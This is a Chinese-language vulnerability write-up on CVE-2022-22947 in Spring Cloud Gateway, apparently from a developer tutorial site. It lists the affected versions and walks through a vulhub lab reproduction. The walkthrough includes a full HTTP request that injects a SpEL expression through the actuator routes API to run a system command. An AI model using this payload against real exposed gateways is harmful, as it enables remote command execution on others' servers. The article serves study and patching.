Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947)
声明:本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,本人不承担任何法律及连带责任。
漏洞描述
使用Spring Cloud Gateway的应用程序在Actuator端点启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可以恶意创建允许在远程主机上执行任意远程执行的请求。
当攻击者可以访问actuator API时,就可以利用该漏洞执行任意命令。
影响范围
Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Spring Cloud Gateway 其他已不再更新的版本
环境搭建
漏洞环境搭建,采用vulhub,搭建方法,自行搜索。
搭建成功后,访问一下
漏洞复现
1.查看actuator端点是开启的
抓包,并修改接口为/actuator
2. 查看/actuator/gateway/routes
返回的路由信息,意思是当访问index时,路由到http://example.com:80
3.创建路由
POST /actuator/gateway/routes/test HTTP/1.1 Host: 192.168.10.171:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT If-None-Match: "3147526947" Cache-Control: max-age=0 Content-Type: application/json Content-Length: 431 { "id": "test", "filters": [ { "name": "AddResponseHeader", "args": { "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}", "name": "cmd" } } ], "uri": "http://example.com:80", "order": 0 }
4.刷新路由
5.访问创建的路由
6.删除路由
7.再次刷新路由
8.然后,访问该路由,发现路由已被删除
到此这篇关于Spring Cloud Gateway远程命令执行漏洞(CVE-2022-22947)的文章就介绍到这了,更多相关Spring Cloud Gateway远程命令执行漏洞内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!
- SpringCloud Hystrix熔断器使用方法介绍
- SpringCloud Gateway动态路由配置详解
- SpringSecurit盐值加密的密码验证以及强密码验证过程
- Spring Cloud Alibaba实现服务的无损下线功能(案例讲解)
- springcloud-gateway集成knife4j的示例详解
- SpringCloud Alibaba环境集成之nacos详解
- Spring Cloud Ribbon 负载均衡使用策略示例详解
- SpringCloud @RefreshScope刷新机制深入探究
- SpringCloud @RefreshScope刷新机制浅析
- SpringCloud启动失败问题汇总
- 一文吃透Spring Cloud gateway自定义错误处理Handler
- SpringCloud Gateway路由组件详解
- SpringCloud OpenFeign基本介绍与实现示例
- Spring Cloud Gateway替代zuul作为API网关的方法
- SpringCloud使用Feign实现远程调用流程详细介绍
- SpringCloud修改Feign日志记录级别过程浅析
- SpringCloud开启session共享并存储到Redis的实现
- Spring Cloud原理以及核心组件详解
相关文章
Java 根据网络URL获取该网页上面所有的img标签并下载图片
这篇文章主要介绍了Java 根据网络URL获取该网页上面所有的img标签并下载图片,帮助大家更好的理解和使用Java,感兴趣的朋友可以了解下2020-11-11java策略枚举:消除在项目里大批量使用if-else的优雅姿势
这篇文章主要给大家介绍了关于Java彻底消灭if-else的8种方案,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习吧2021-06-06springboot集成nacos读取nacos配置数据的原理
这篇文章主要介绍了springboot集成nacos读取nacos配置数据的原理,文中有详细的代码流程,对大家学习springboot集成nacos有一定的帮助,需要的朋友可以参考下2023-05-05
最新评论